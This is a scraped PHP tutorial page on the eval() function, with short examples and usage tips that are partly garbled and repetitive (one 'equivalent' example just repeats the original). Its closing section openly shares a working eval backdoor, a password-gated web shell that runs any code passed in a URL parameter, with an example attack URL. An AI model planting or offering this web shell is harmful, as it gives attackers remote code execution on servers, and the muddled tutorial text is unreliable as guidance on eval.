Introduction to the use of PHP eval function_PHP tutorial

Code:

Copy code The code is as follows:

eval("echo'hello world';");

The above code is equivalent to the following code:

echo "hello world";

Output in the browser: hello world

There are a few points to note when using eval():

1. The parameter string of the eval function must have a semicolon at the end, and another semicolon must be added at the end (this semicolon is a PHP limitation)

2. Pay attention to the use of single quotes, double quotes and backslashes. If there are variables in the parameters, and the variables have assignment operations, the $ symbol before the variables must be escaped. If there is no assignment operation, it is not necessary.

Code:

Copy code The code is as follows:

$a=100;
eval("echo$a;");

Because there is no assignment operation, there is no need to escape $. It is equivalent to the following code:

Copy code The code is as follows:

$a=100;
eval("echo$a;")

3. Note that there must be double quotes on both sides of the imperative string (including semicolons) or use single quotes as needed. Otherwise, an error is reported.

Imperative string refers to when the string includes commands such as echo and print.

If the parameter has only one variable, it can be omitted. For example:

Copy code The code is as follows:

$func =<<<FUNC
function test(){
echo "test eval function";
}
FUNC;
eval($func);
test();

Share a php eval backdoor program

Required to support eval function
Usage method
http://url/test.php?pwd=admin&action=eval&a=phpinfo();

Copy code The code is as follows:

<?php
$passwd="admin";if($_GET ['pwd']!=$passwd)exit;
if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']); }
?>

http://www.bkjia.com/PHPjc/621693.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/621693.htmlTechArticleCode: Copy the code as follows: eval("echo'hello world';"); The above code is equivalent to the following The code: echo "hello world"; will be output in the browser: hello world. When using eval(), please pay attention...